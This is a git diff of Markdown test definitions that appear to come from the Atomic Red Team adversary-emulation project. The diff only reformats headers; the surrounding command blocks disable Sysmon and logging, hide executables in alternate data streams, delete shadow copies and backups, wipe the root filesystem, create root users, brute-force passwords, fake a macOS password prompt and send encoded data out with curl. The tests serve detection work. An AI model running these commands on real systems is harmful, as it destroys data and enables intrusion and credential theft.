@@ -134,8 +128,7 @@ Disables OpenDNS Umbrella
**Supported Platforms:** macOS
#### Run it with `sh`!
```
#### Run it with `sh`! ```
sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
```
<br/>
@@ -152,8 +145,7 @@ Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon servic
|------|-------------|------|---------------|
| sysmon_driver | The name of the Sysmon filter driver (this can change from the default) | string | SysmonDrv|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin) ```
fltmc.exe unload #{sysmon_driver}
```
<br/>
@@ -171,8 +163,7 @@ This action requires HTTP logging configurations in IIS to be unlocked.
|------|-------------|------|---------------|
| website_name | The name of the website on a server | string | Default Web Site|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true
```
<br/>
@@ -184,8 +175,7 @@ Uninstall Sysinternals Sysmon for Defense Evasion
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin) ```
sysmon -u
```
<br/>
atomics/T1090/T1090.md
+1 -2
View File
@@ -31,8 +31,7 @@ Note that this test may conflict with pre-existing system configuration.
| proxy_server | Proxy server URL (host:port) | url | 127.0.0.1:8080|
| proxy_scheme | Protocol to proxy (http or https) | string | http|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
export #{proxy_scheme}_proxy=#{proxy_server}
```
<br/>
atomics/T1096/T1096.md
+1 -2
View File
@@ -26,8 +26,7 @@ Execute from Alternate Streams
|------|-------------|------|---------------|
| path | Path of ADS file | path | c:\ADS\|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 #{path}\procexp.cab #{path}\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump #{path}\procexp.exe > #{path}\file.txt:procexp.exe
atomics/T1097/T1097.md
+1 -2
View File
@@ -27,8 +27,7 @@ Similar to PTH, but attacking Kerberos
| user_name | username | string | Administrator|
| domain | domain | string | atomic.local|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
mimikatz # kerberos::ptt #{user_name}@#{domain}
```
<br/>
atomics/T1098/T1098.md
+1 -2
View File
@@ -15,8 +15,7 @@ Manipulate Admin Account Name
**Supported Platforms:** Windows
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
$x = Get-Random -Minimum 2 -Maximum 9999
$y = Get-Random -Minimum 2 -Maximum 9999
$z = Get-Random -Minimum 2 -Maximum 9999
atomics/T1099/T1099.md
+7 -14
View File
@@ -32,8 +32,7 @@ Stomps on the access timestamp of a file
|------|-------------|------|---------------|
| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
touch -a -t 197001010000.00 #{target_filename}
```
<br/>
@@ -50,8 +49,7 @@ Stomps on the modification timestamp of a file
|------|-------------|------|---------------|
| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
touch -m -t 197001010000.00 #{target_filename}
```
<br/>
@@ -71,8 +69,7 @@ Sudo or root privileges are required to change date. Use with caution.
|------|-------------|------|---------------|
| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
NOW=$(date)
date -s "1970-01-01 00:00:00"
touch #{target_filename}
@@ -96,8 +93,7 @@ This technique was used by the threat actor Rocke during the compromise of Linux
| reference_file_path | Path of reference file to read timestamps from | Path | /bin/sh|
| target_file_path | Path of file to modify timestamps of | Path | /opt/filename|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
touch -acmr #{reference_file_path} {target_file_path}
```
<br/>
@@ -117,8 +113,7 @@ This technique was seen in use by the Stitch RAT.
| file_path | Path of file to change creation timestamp | Path | C:\Some\file.txt|
| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
powershell.exe Get-ChildItem #{file_path} | % { $_.CreationTime = #{target_date_time} }
```
<br/>
@@ -138,8 +133,7 @@ This technique was seen in use by the Stitch RAT.
| file_path | Path of file to change last modified timestamp | Path | C:\Some\file.txt|
| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
powershell.exe Get-ChildItem #{file_path} | % { $_.LastWriteTime = #{target_date_time} }
```
<br/>
@@ -159,8 +153,7 @@ This technique was seen in use by the Stitch RAT.
| file_path | Path of file to change last access timestamp | Path | C:\Some\file.txt|
| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
powershell.exe Get-ChildItem #{file_path} | % { $_.LastAccessTime = #{target_date_time} }
```
<br/>
atomics/T1100/T1100.md
+1 -2
View File
@@ -25,8 +25,7 @@ cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/
| web_shell_path | The path to drop the web shell | string | C:\inetpub\wwwroot|
| web_shells | Path of Web Shell | path | C:\AtomicRedTeam\atomics\T1100\shells\|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
xcopy #{web_shells} #{web_shell_path}
```
<br/>
atomics/T1101/T1101.md
+1 -2
View File
@@ -20,8 +20,7 @@ Add a value to a Windows registry SSP key, simulating an adversarial modificatio
|------|-------------|------|---------------|
| fake_ssp_dll | Value added to registry key. Normally refers to a DLL name in C:\Windows\System32. | String | not-a-ssp|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
# run these in sequence
$SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
$SecurityPackagesUpdated = $SecurityPackages
atomics/T1103/T1103.md
+1 -2
View File
@@ -22,8 +22,7 @@ AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded i
|------|-------------|------|---------------|
| registry_file | Windows Registry File | Path | T1103.reg|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
reg.exe import #{registry_file}
```
<br/>
atomics/T1105/T1105.md
+9 -18
View File
@@ -41,8 +41,7 @@ Utilize rsync to perform a remote file copy (push)
| remote_host | Remote host to copy toward | String | victim-host|
| remote_path | Remote path to receive rsync | Path | /tmp/victim-files|
#### Run it with `bash`!
```
#### Run it with `bash`! ```
rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
```
<br/>
@@ -62,8 +61,7 @@ Utilize rsync to perform a remote file copy (pull)
| remote_host | Remote host to copy from | String | adversary-host|
| local_path | Local path to receive rsync | Path | /tmp/victim-files|
#### Run it with `bash`!
```
#### Run it with `bash`! ```
rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
```
<br/>
@@ -83,8 +81,7 @@ Utilize scp to perform a remote file copy (push)
| remote_host | Remote host to copy toward | String | victim-host|
| remote_path | Remote path to receive scp | Path | /tmp/victim-files/|
#### Run it with `bash`!
```
#### Run it with `bash`! ```
scp #{local_file} #{username}@#{remote_host}:#{remote_path}
```
<br/>
@@ -104,8 +101,7 @@ Utilize scp to perform a remote file copy (pull)
| remote_host | Remote host to copy from | String | adversary-host|
| local_path | Local path to receive scp | Path | /tmp/victim-files/|
#### Run it with `bash`!
```
#### Run it with `bash`! ```
scp #{username}@#{remote_host}:#{remote_file} #{local_path}
```
<br/>
@@ -125,8 +121,7 @@ Utilize sftp to perform a remote file copy (push)
| remote_host | Remote host to copy toward | String | victim-host|
| remote_path | Remote path to receive sftp | Path | /tmp/victim-files/|
#### Run it with `bash`!
```
#### Run it with `bash`! ```
sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
```
<br/>
@@ -146,8 +141,7 @@ Utilize sftp to perform a remote file copy (pull)
| remote_host | Remote host to copy from | String | adversary-host|
| local_path | Local path to receive sftp | Path | /tmp/victim-files/|
#### Run it with `bash`!
```
#### Run it with `bash`! ```
sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
```
<br/>
@@ -165,8 +159,7 @@ Use certutil -urlcache argument to download a file from the web. Note - /urlcach
| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Local path to place file | Path | Atomic-license.txt|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
```
<br/>
@@ -184,8 +177,7 @@ Use certutil -verifyctl argument to download a file from the web. Note - /verify
| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Local path to place file | Path | Atomic-license.txt|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
$datePath = "certutil-$(Get-Date -format yyyy_MM_dd_HH_mm)"
New-Item -Path $datePath -ItemType Directory
Set-Location $datePath
@@ -209,8 +201,7 @@ This technique is used by Qbot malware to download payloads.
| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
| local_path | Local path to place file | Path | Atomic-license.txt|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} #{local_path}
```
<br/>
atomics/T1107/T1107.md
+12 -24
View File
@@ -44,8 +44,7 @@ Delete a single file from the temporary directory
|------|-------------|------|---------------|
| file_to_delete | Path of file to delete | Path | /tmp/victim-files/a|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
rm -f #{file_to_delete}
```
<br/>
@@ -62,8 +61,7 @@ Recursively delete the temporary directory and all files contained within it
|------|-------------|------|---------------|
| folder_to_delete | Path of folder to delete | Path | /tmp/victim-files|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
rm -rf #{folder_to_delete}
```
<br/>
@@ -80,8 +78,7 @@ Use the `shred` command to overwrite the temporary file and then delete it
|------|-------------|------|---------------|
| file_to_shred | Path of file to shred | Path | /tmp/victim-shred.txt|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
shred -u #{file_to_shred}
```
<br/>
@@ -98,8 +95,7 @@ Delete a single file from the temporary directory using cmd.exe
|------|-------------|------|---------------|
| file_to_delete | Path of file to delete | Path | C:\Windows\Temp\victim-files-cmd\a|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
del /f #{file_to_delete}
```
<br/>
@@ -116,8 +112,7 @@ Recursively delete the temporary directory and all files contained within it usi
|------|-------------|------|---------------|
| folder_to_delete | Path of folder to delete | Path | C:\Windows\Temp\victim-files-cmd|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
del /f /S #{folder_to_delete}
```
<br/>
@@ -134,8 +129,7 @@ Delete a single file from the temporary directory using Powershell
|------|-------------|------|---------------|
| file_to_delete | Path of file to delete | Path | C:\Windows\Temp\victim-files-ps\a|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
Remove-Item -path "#{file_to_delete}"
```
<br/>
@@ -152,8 +146,7 @@ Recursively delete the temporary directory and all files contained within it usi
|------|-------------|------|---------------|
| folder_to_delete | Path of folder to delete | Path | C:\Windows\Temp\victim-files-ps|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
Remove-Item -path "#{folder_to_delete}" -recurse
```
<br/>
@@ -165,8 +158,7 @@ Delete all volume shadow copies with vssadmin.exe
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
vssadmin.exe Delete Shadows /All /Quiet
```
<br/>
@@ -178,8 +170,7 @@ Delete all volume shadow copies with wmic
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
wmic shadowcopy delete
```
<br/>
@@ -191,8 +182,7 @@ This test leverages `bcdedit` to remove boot-time recovery measures.
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
```
@@ -205,8 +195,7 @@ This test deletes Windows Backup catalogs.
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
wbadmin delete catalog -quiet
```
<br/>
@@ -218,8 +207,7 @@ This test deletes the entire root filesystem of a Linux system. This technique w
**Supported Platforms:** Linux, CentOS, Ubuntu
#### Run it with `bash`!
```
#### Run it with `bash`! ```
rm -rf / --no-preserve-root > /dev/null 2> /dev/null
```
<br/>
atomics/T1110/T1110.md
+1 -2
View File
@@ -47,8 +47,7 @@ Creates username and password files then attempts to brute force on remote host
| remote_host | Hostname of the target system we will brute force upon | String | \\COMPANYDC1\IPC$|
| domain | Domain name of the target system we will brute force upon | String | YOUR_COMPANY|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
net user /domain > #{input_file_users}
echo "Password1" >> #{input_file_passwords}
echo "1q2w3e4r" >> #{input_file_passwords}
atomics/T1112/T1112.md
+3 -6
View File
@@ -25,8 +25,7 @@ Modify the registry of the currently logged in user using reg.exe cia cmd consol
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f
```
<br/>
@@ -39,8 +38,7 @@ CMD is ran as Administrative rights.
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f
```
<br/>
@@ -52,8 +50,7 @@ Modify a registry key of each user profile not currently loaded on the machine u
**Supported Platforms:** Windows
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
# here is an example of using the same method of reg load, but without the New-PSDrive cmdlet.
# Here we can load all unloaded user hives and do whatever we want in the location below (comments)
$PatternSID = 'S-1-5-21-\d+-\d+\-\d+\-\d+$'
atomics/T1113/T1113.md
+4 -8
View File
@@ -35,8 +35,7 @@ Use screencapture command to collect a full desktop screenshot
| output_file | xxx
| Path | desktop.png|
#### Run it with `bash`!
```
#### Run it with `bash`! ```
screencapture
```
<br/>
@@ -54,8 +53,7 @@ Use screencapture command to collect a full desktop screenshot
| output_file | xxx
| Path | desktop.png|
#### Run it with `bash`!
```
#### Run it with `bash`! ```
screencapture -x
```
<br/>
@@ -73,8 +71,7 @@ Use xwd command to collect a full desktop screenshot and review file with xwud
| output_file | xxx
| Path | desktop.xwd|
#### Run it with `bash`!
```
#### Run it with `bash`! ```
xwd -root -out #{output_file}
xwud -in #{output_file}
```
@@ -93,8 +90,7 @@ Use import command to collect a full desktop screenshot
| output_file | xxx
| Path | desktop.png|
#### Run it with `bash`!
```
#### Run it with `bash`! ```
import -window root
```
<br/>
atomics/T1114/T1114.md
+1 -2
View File
@@ -21,8 +21,7 @@ Search through local Outlook installation, extract mail, compress the contents,
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
Display email contents in the terminal
PS C:\> .\Get-Inbox.ps1
atomics/T1115/T1115.md
+2 -4
View File
@@ -25,8 +25,7 @@ Add data to clipboard to copy off or execute commands from.
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
dir | clip
clip < readme.txt
```
@@ -39,8 +38,7 @@ Utilize PowerShell to echo a command to clipboard and execute it
**Supported Platforms:** Windows
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
echo Get-Process | clip
Get-Clipboard | iex
```
atomics/T1117/T1117.md
+3 -6
View File
@@ -30,8 +30,7 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
|------|-------------|------|---------------|
| filename | Name of the local file, include path. | Path | C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
regsvr32.exe /s /u /i:#{filename} scrobj.dll
```
<br/>
@@ -48,8 +47,7 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
|------|-------------|------|---------------|
| url | URL to hosted sct file | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
regsvr32.exe /s /u /i:#{url} scrobj.dll
```
<br/>
@@ -66,8 +64,7 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
|------|-------------|------|---------------|
| dll_name | Name of DLL to Execute, DLL Should export DllRegisterServer | Path | C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
"IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )"
```
<br/>
atomics/T1118/T1118.md
+2 -4
View File
@@ -24,8 +24,7 @@ Executes the Uninstall Method
|------|-------------|------|---------------|
| filename | location of the payload | Path | C:\AtomicRedTeam\atomics\T1118\src\T1118.dll|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:C:\AtomicRedTeam\atomics\T1118\src\T1118.dll C:\AtomicRedTeam\atomics\T1118\src\T1118.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U #{filename}
```
@@ -43,8 +42,7 @@ Executes the Uninstall Method
|------|-------------|------|---------------|
| filename | location of the payload | Path | C:\AtomicRedTeam\atomics\T1118\src\T1118.dll|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:C:\AtomicRedTeam\atomics\T1118\src\T1118.dll C:\AtomicRedTeam\atomics\T1118\src\T1118.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /? #{filename}
```
atomics/T1119/T1119.md
+2 -4
View File
@@ -19,8 +19,7 @@ Automated Collection
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
dir c: /b /s .docx | findstr /e .docx
for /R c: %f in (*.docx) do copy %f c:\temp\
```
@@ -33,8 +32,7 @@ Automated Collection
**Supported Platforms:** Windows
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination c:\temp}
```
<br/>
atomics/T1121/T1121.md
+2 -4
View File
@@ -25,8 +25,7 @@ Executes the Uninstall Method, No Admin Rights Required
| file_name | Location of the payload | Path | T1121.dll|
| source_file | Location of the CSharp source_file | Path | C:\AtomicRedTeam\atomics\T1121\src\T1121.cs|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library #{source_file}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{file_name}
del #{file_name}
@@ -46,8 +45,7 @@ Executes the Uninstall Method, No Admin Rights Required, Requires SNK
| file_name | Location of the payload | Path | T1121.dll|
| source_file | Location of the CSharp source_file | Path | C:\AtomicRedTeam\atomics\T1121\src\T1121.cs|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte
atomics/T1122/T1122.md
+1 -2
View File
@@ -15,8 +15,7 @@ Hijack COM Object used by certutil.exe
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
reg import ..\src\COMHijack.reg
certutil.exe -CAInfo
reg import ..\src\COMHijackCleanup.reg
atomics/T1123/T1123.md
+2 -4
View File
@@ -25,8 +25,7 @@ Create a file called test.wma, with the duration of 30 seconds
| output_file | Path to the recording file being captured | Path | test.wma|
| duration_hms | Duration of audio to be recorded (in h:m:s format) | Path | 30|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
```
<br/>
@@ -38,8 +37,7 @@ SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
```
<br/>
atomics/T1124/T1124.md
+2 -4
View File
@@ -24,8 +24,7 @@ Identify the system time
|------|-------------|------|---------------|
| computer_name | computer name to query | string | computer1|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
net time \\#{computer_name}
w32tm /tz
```
@@ -38,8 +37,7 @@ Identify the system time via PowerShell
**Supported Platforms:** Windows
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
Get-Date
```
<br/>
atomics/T1126/T1126.md
+3 -6
View File
@@ -26,8 +26,7 @@ Add a Network Share utilizing the command_prompt
|------|-------------|------|---------------|
| share_name | Share to add. | string | \\test\share|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
net use c: #{share_name}
net share test=#{share_name} /REMARK:"test share" /CACHE:No
```
@@ -45,8 +44,7 @@ Removes a Network Share utilizing the command_prompt
|------|-------------|------|---------------|
| share_name | Share to remove. | string | \\test\share|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
net share #{share_name} /delete
```
<br/>
@@ -63,8 +61,7 @@ Removes a Network Share utilizing PowerShell
|------|-------------|------|---------------|
| share_name | Share to remove. | string | \\test\share|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
Remove-SmbShare -Name #{share_name}
Remove-FileShare -Name #{share_name}
```
atomics/T1127/T1127.md
+1 -2
View File
@@ -52,8 +52,7 @@ Executes the code in a project file using. C# Example
|------|-------------|------|---------------|
| filename | Location of the project file | Path | T1127.csproj|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename}
```
<br/>
atomics/T1128/T1128.md
+1 -2
View File
@@ -24,8 +24,7 @@ Netsh interacts with other operating system components using dynamic-link librar
|------|-------------|------|---------------|
| helper_file | Path to DLL | Path | C:\Path\file.dll|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
netsh.exe add helper #{helper_file}
```
<br/>
atomics/T1130/T1130.md
+1 -2
View File
@@ -29,8 +29,7 @@ Creates a root CA with openssl
| key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key|
| cert_filename | Path of the CA certificate we create | Path | rootCA.crt|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
openssl genrsa -out #{key_filename} 4096
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -out #{cert_filename}
atomics/T1132/T1132.md
+1 -2
View File
@@ -21,8 +21,7 @@ Utilizing a common technique for posting base64 encoded data.
| destination_url | Destination URL to post encoded data. | string | redcanary.com|
| base64_data | Encoded data to post using fake Social Security number 111-11-1111. | string | MTExLTExLTExMTE=|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
echo -n 111-11-1111 | base64
curl -XPOST #{base64_data}.#{destination_url}
```
atomics/T1134/T1134.md
+1 -2
View File
@@ -35,8 +35,7 @@ Requires Administrator Privileges To Execute Test
|------|-------------|------|---------------|
| target_user | Username To Steal Token From | String | SYSTEM|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
#list processes by user,
$owners = @{}
atomics/T1135/T1135.md
+3 -6
View File
@@ -36,8 +36,7 @@ Network Share Discovery
|------|-------------|------|---------------|
| computer_name | Computer name to find a mount on. | string | computer1|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
df -aH
smbutil view -g //#{computer_name}
showmount #{computer_name}
@@ -56,8 +55,7 @@ Network Share Discovery utilizing the command prompt
|------|-------------|------|---------------|
| computer_name | Computer name to find a mount on. | string | computer1|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
net view \\#{computer_name}
```
<br/>
@@ -74,8 +72,7 @@ Network Share Discovery utilizing PowerShell
|------|-------------|------|---------------|
| computer_name | Computer name to find a mount on. | string | computer1|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
net view \\#{computer_name}
get-smbshare -Name #{computer_name}
```
atomics/T1136/T1136.md
+5 -10
View File
@@ -31,8 +31,7 @@ Create a user via useradd
| username | Username of the user to create | String | evil_user|
| comment | Comment to record when creating the user | String | Evil Account|
#### Run it with `bash`!
```
#### Run it with `bash`! ```
useradd -M -N -r -s /bin/bash -c "#{comment}" #{username}
```
<br/>
@@ -50,8 +49,7 @@ Creates a user on a MacOS system with dscl
| username | Username of the user to create | String | evil_user|
| realname | 'realname' to record when creating the user | String | Evil Account|
#### Run it with `bash`!
```
#### Run it with `bash`! ```
dscl . -create /Users/#{username}
dscl . -create /Users/#{username} UserShell /bin/bash
dscl . -create /Users/#{username} RealName "#{realname}"
@@ -73,8 +71,7 @@ Creates a new user in a command prompt
|------|-------------|------|---------------|
| username | Username of the user to create | String | Evil Account|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
net user /add #{username}
```
<br/>
@@ -91,8 +88,7 @@ Creates a new user in PowerShell
|------|-------------|------|---------------|
| username | Username of the user to create | String | Evil Account|
#### Run it with `powershell`!
```
#### Run it with `powershell`! ```
New-LocalUser -Name #{username} -NoPassword
net user /add #{username}
```
@@ -111,8 +107,7 @@ Creates a new user in Linux and adds the user to the `root` group. This techniqu
| username | Username of the user to create | String | butter|
| password | Password of the user to create | String | BetterWithButter|
#### Run it with `bash`!
```
#### Run it with `bash`! ```
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash #{username}
echo "#{password}" | passwd --stdin #{username}
```
atomics/T1137/T1137.md
+1 -2
View File
@@ -58,8 +58,7 @@ Word VBA Macro
**Supported Platforms:** Windows
#### Run it with these steps!
1. Open Word
#### Run it with these steps! 1. Open Word
2. Insert tab -> Quick Parts -> Field
atomics/T1138/T1138.md
+1 -2
View File
@@ -36,8 +36,7 @@ place to start.
|------|-------------|------|---------------|
| file_path | Path to the shim databaase file | String | C:\AtomicRedTeam\atomics\T1138\src\AtomicShimx86.sdb|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
sdbinst.exe #{file_path}
sdbinst.exe -u #{file_path}
```
atomics/T1139/T1139.md
+1 -2
View File
@@ -22,8 +22,7 @@ xxxx
| bash_history_grep_args | grep arguments that filter out specific commands we want to capture | Path | -e '-p ' -e 'pass' -e 'ssh'|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
#### Run it with `sh`!
```
#### Run it with `sh`! ```
cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}
```
<br/>
atomics/T1140/T1140.md
+2 -4
View File
@@ -28,8 +28,7 @@ Encode/Decode executable
|------|-------------|------|---------------|
| executable | name of executable | path | c:\file.exe|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
certutil.exe -encode #{executable} file.txt
certutil.exe -decode file.txt #{executable}
```
@@ -47,8 +46,7 @@ Rename certutil and decode a file. This is in reference to latest research by Fi
|------|-------------|------|---------------|
| executable | name of executable/file to decode | path | c:\file.exe|
#### Run it with `command_prompt`!
```
#### Run it with `command_prompt`! ```
cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp
cmd.exe /c %temp%tcm.tmp -decode #{executable} file.txt
```
atomics/T1141/T1141.md
+2 -4
View File
@@ -20,8 +20,7 @@ Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.htm
**Supported Platforms:** macOS
#### Run it with `sh`!
```
#### Run it with `sh`! ```
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
```
<br/>
@@ -35,8 +34,7 @@ Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
